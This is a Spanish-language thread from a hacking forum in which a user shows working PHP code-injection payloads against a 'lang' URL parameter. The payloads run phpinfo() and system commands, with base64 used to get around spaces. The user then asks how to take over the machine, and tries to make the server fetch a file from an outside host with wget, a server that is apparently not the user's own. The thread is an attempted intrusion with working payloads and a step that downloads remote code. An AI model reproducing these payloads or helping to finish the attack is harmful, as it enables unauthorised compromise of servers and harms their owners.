elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Buscar Ingresar Registrarse
27 Mayo 2012, 15:07  


Tema destacado: Últimos eventos sobre seguridad/inseguridad

+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking Avanzado
| | |-+  Hacking Básico (Moderadores: zhyzura, kamsky, TRICKY)
| | | |-+  PHP injection		 0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: PHP injection  (Leído 1,127 veces)
chusrubi2

Desconectado Desconectado

Mensajes: 6



Ver Perfil
PHP injection
« en: 10 Junio 2011, 01:41 »
Buenas.

Bueno pues estoy intentado utilizar un ataque php injection. Esta es mi situación:


1.-http://localhost/?lang=${@phpinfo()}   FUNCIONA / http://localhost/?lang=http//localhost/phpinfo.txt NO FUNCIONA (obviamente tiene el código php para mostrar el phpinfo).

2.-Me puse a toquetear y a investigar http://localhost/?lang=${@system(ls -l)} NO FUNCIONA, al no funcionar me sale el típico error 500 y me añade %20 en la url (espacio).
Así que pensé en utilizar base64.

3.-http://localhost/?lang=${@system(base64_decode(bHMgLWw))} FUNCIONA

Ahora es aquí donde me atasco. Qué debería hacer para acceder a la máquina. He estado leyendo y hay que subir archivos con wget etc, pero es que no encuentro la fórmula de cómo poner la url ni que archivo subir.

Thanks.  ;D
« Última modificación: 10 Junio 2011, 01:53 por chusrubi2 » En línea
chusrubi2

Desconectado Desconectado

Mensajes: 6



Ver Perfil
Re: PHP injection
« Respuesta #1 en: 10 Junio 2011, 16:06 »
Bueno si he sido capaz de utilizar el system(ls -l), obviamente es linux. Particularmente:
System   Linux PERSEO 2.6.18-53.el5 #1 SMP Mon Nov 12 02:22:48 EST 2007 i686

Pero no estoy muy familiarizado con la consola de linux (solo lo básico, instalar programas etc).

¿Qué comandos, y de qué manera debería ponerlos en la url para acceder?

Gracias.

Edito: he estado investigando un poco y he empezado a usar el wget como prueba. Lo que he hecho es simplemente escribir system(wget) y sí me sale que tengo que poner la url despues del wget, pero por el problema de los espacios lo he hecho en base64.
Lo que he hecho ha sido: system(base64_decode(XXXCODEENBASE64))
XXXCODEENBASE64=wget xxx.com/phpinfo.txt
Pero no funciona, se tira todo el rato cargando y no hace nada...
En línea
Shell Root


Desconectado Desconectado

Mensajes: 2.456


Alex Jurado


Ver Perfil WWW
Re: PHP injection
« Respuesta #2 en: 10 Junio 2011, 18:38 »
Pues no se que quieres hacer, pero... el wget lo puedes hacer desde la misma consola de tu PC
En línea
---
chusrubi2

Desconectado Desconectado

Mensajes: 6



Ver Perfil
Re: PHP injection
« Respuesta #3 en: 10 Junio 2011, 19:51 »
Quiero subir un archivo (en el caso en el que no sea mi pc).
Nada intento el wget host.com/file.txt (en base64) y nada la web no carga...
¿Qué otra cosa puedo hacer?
« Última modificación: 10 Junio 2011, 20:47 por chusrubi2 » En línea
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Injection SQL
Hacking Básico 		buentipo_cc 1 637 Último mensaje 24 Febrero 2004, 07:09
por vicecity
SQL injection
Desarrollo Web 		Blank Demon 0 383 Último mensaje 2 Septiembre 2004, 07:38
por Blank Demon
Sql injection
Nivel Web 		TheAnswer 1 1,957 Último mensaje 11 Octubre 2004, 08:07
por Jec
SQL Injection en PHP
Hacking Básico 		Akagba 1 451 Último mensaje 15 Octubre 2004, 09:16
por Ambolius
CAST EXEC en sql injection(Automated Sql Injection)
Nivel Web 		EvilGoblin 2 1,958 Último mensaje 11 Julio 2010, 22:25
por EvilGoblin
Powered by SMF 1.1.16 | SMF © 2006-2008, Simple Machines